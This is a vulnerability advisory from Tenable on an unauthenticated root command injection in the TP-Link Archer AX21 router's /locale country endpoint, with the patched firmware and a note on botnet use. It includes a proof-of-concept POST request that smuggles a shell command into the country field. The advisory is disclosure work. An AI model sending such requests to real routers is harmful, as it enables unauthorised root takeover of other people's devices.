Synopsis
Researchers at Tenable discovered an unauthenticated command injection in the web management interface of the TP-Link Archer AX21 (AX1800). This issue was also independently discovered by other research teams, as noted in ZDI-23-451.
Update 24 April 2023: As indicated in a blog released by the Zero Day Initiative, when combined with ZDI-23-452 / CVE-2023-27359 this bug can lead to unauthenticated command injection via the WAN interface.
Technical Details
The country parameter, of the write callback for the country form at the /cgi-bin/luci/;stok=/locale endpoint is vulnerable to a simple command injection vulnerability.
The country parameter was used in a call to popen(), which executes as root, but only after first being set in an initial request.
That is to say, to exploit the issue, an attacker would first have to send the payload as part of the country parameter to set the value, and upon sending a second request (identical or not) to the country endpoint, the first payload would be executed as part of the popen command.
Proof of Concept:
Sending a request similar to the following twice in a row would run the $(id>/tmp/out) command on the second request, creating the /tmp/out file containing the output of the id command.
POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1 Host: <target router> Content-Type: application/x-www-form-urlencoded operation=write&country=$(id>/tmp/out)
Solution
TP-Link has released firmware version 1.1.4 Build 20230219 which fixes the issue by removing the vulnerable callback.
Additional References
https://www.tp-link.com/us/support/download/archer-ax21/v3/#Firmwarehttps://www.zerodayinitiative.com/advisories/ZDI-23-451/
https://www.zerodayinitiative.com/advisories/ZDI-23-452/
https://www.zerodayinitiative.com/blog/2023/4/21/tp-link-wan-side-vulnerability-cve-2023-1389-added-to-the-mirai-botnet-arsenal
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]
Contact our sales team